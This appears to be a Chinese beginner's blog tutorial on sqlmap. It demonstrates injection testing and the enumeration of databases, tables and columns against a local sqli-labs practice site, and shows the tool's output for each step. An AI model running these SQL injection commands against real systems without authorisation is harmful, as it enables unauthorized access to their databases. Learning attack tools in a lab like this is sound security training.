一只菜鸡的保安入门之路
环境搭建不想说啥,网上很多,我很菜,折腾了一周多,确实是不难,是我蛋疼
先从一个最基本的命令开始 sqlmap -h
[假装这里有个图片]参数太多了,图有点长,还是不放了吧*
具体的参数可以大概看一下
sqlmap -hh 可以获得完整的说明文档
常用的有下面这几个参数:
1. sqlmap -u <url>
测试一个url是否存在注入
这个url指的是包含请求参数的可能存在注入漏洞的url,比如http://sqli.snowing.com/Less-1/?id=1这样子的
sqlmap -u http://sqli.snowing.com/Less-1/?id=1
其中产生的结论信息原文如下:
[22:06:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 (xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
1. 服务器操作系统:Linux Ubuntu 16.04 (xenial)
2. web服务提供应用:Apache 2.4.18
3. 数据库信息:MySQL >= 5.0
2. sqlmap -r <request_info_file>
测试一个包含请求信息的文本文件是否存在注入
文件里面是一个http请求的request信息,大概长这样子:
GET /Less-1/?id=1 HTTP/1.1
Host: sqli.snowing.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
比如用一个名为req_info.txt的文件存放这些信息,则使用 sqlmap -r req_info.txt
来测试文件中的请求是否存在注入
-r 参数一般在存在cookie注入的时候使用,避免设置cookie、post等其他参数
3. sqlmap -u <url> --dbs
查询当前用户下的所有数据库
sqlmap -u http://sqli.snowing.com/Less-1/?id=1 --dbs
其中产生的结论信息原文如下:
[23:44:26] [INFO] fetching database names
[23:44:26] [WARNING] the SQL query provided does not return any output
[23:44:26] [INFO] used SQL query returns 8 entries
[23:44:26] [INFO] resumed: information_schema
[23:44:26] [INFO] resumed: challenges
[23:44:26] [INFO] resumed: dvwa
[23:44:26] [INFO] resumed: mysql
[23:44:26] [INFO] resumed: performance_schema
[23:44:26] [INFO] resumed: phpmyadmin
[23:44:26] [INFO] resumed: security
[23:44:26] [INFO] resumed: sys
available databases [8]:
[] challenges
[] dvwa
[] information_schema
[] mysql
[] performance_schema
[] phpmyadmin
[] security
[] sys
测试返回当前用户下所有的数据库名称:
available databases [8]:
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] security
[*] sys
4. sqlmap -u <url> -D <database> --tables
获取指定数据库中的表名
sqlmap -u http://sqli.snowing.com/Less-1/?id=1 -D security --tables
其中产生的结论信息原文如下:
[00:02:18] [INFO] fetching tables for database: ‘security’
[00:02:18] [WARNING] the SQL query provided does not return any output
[00:02:18] [INFO] used SQL query returns 4 entries
[00:02:18] [INFO] resumed: emails
[00:02:18] [INFO] resumed: referers
[00:02:18] [INFO] resumed: uagents
[00:02:18] [INFO] resumed: users
Database: security
[4 tables]
±---------+
| emails |
| referers |
| uagents |
| users |
±---------+
得到了如下几个数据表的名称:
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
5. sqlmap -u <url> -D <database> -T <table> --columns
获取表中的字段名
sqlmap -u http://sqli.snowing.com/Less-1/?id=1 -D security -T users --columns
上面的测试结果得到了users表中的字段名和对应类型:
[16:35:24] [INFO] fetching columns for table ‘users’ in database ‘security’
[16:35:24] [WARNING] the SQL query provided does not return any output
[16:35:24] [INFO] used SQL query returns 3 entries
[16:35:24] [INFO] retrieved: id
[16:35:24] [INFO] retrieved: int(3)
[16:35:24] [INFO] retrieved: username
[16:35:24] [INFO] retrieved: varchar(20)
[16:35:24] [INFO] retrieved: password
[16:35:24] [INFO] retrieved: varchar(20)
Database: security
Table: users
[3 columns]
±---------±------------+
| Column | Type |
±---------±------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
±---------±------------+
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| id | int(3) |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+
6. sqlmap -u <url> --current-db
获取当前网站数据库的名称
sqlmap -u http://sqli.snowing.com/Less-1/?id=1 --current-db
[16:45:03] [INFO] fetching current database
[16:45:03] [INFO] retrieved: security
current database: ‘security’
可以看到当前网站的数据库名称是 security
sqlmap 完整参数说明
sqlmap -hh
列出所有的参数信息 放一个搬运的说明
>-< 菜鸡求大佬带…